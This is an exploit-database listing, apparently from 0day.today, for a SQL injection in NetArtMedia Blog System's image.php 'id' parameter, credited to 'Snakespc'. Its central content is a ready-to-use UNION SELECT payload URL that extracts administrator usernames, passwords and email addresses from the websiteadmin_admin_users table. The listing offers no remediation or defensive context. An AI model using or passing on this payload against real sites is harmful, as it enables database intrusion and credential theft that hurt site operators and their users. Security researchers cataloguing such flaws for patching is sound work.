[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NetArtMedia Blog System (image.php id) SQL Injection Vulnerability

Author
Snakespc
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4232
Category
web applications
Date add
23-11-2008
Platform
unsorted
==================================================================
NetArtMedia Blog System (image.php id) SQL Injection Vulnerability
==================================================================


==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =                                                                                    =
                =           Sript : http://www.netartmedia.net/blogsystem/                           =
                =                               www.netartmedia.net                                  =              
                 =================================== Snakespc ======================================    


[*]Exploit:
Using FireFox
view-source:http://localhost/[script_path]/image.php?id=-1 UNION SELECT 1,2,concat_ws(0x3e,username,password,email),4,5,6,7 FROM websiteadmin_admin_users--
                                                                   
===================================================================================================================



#  0day.today [2024-10-05]  #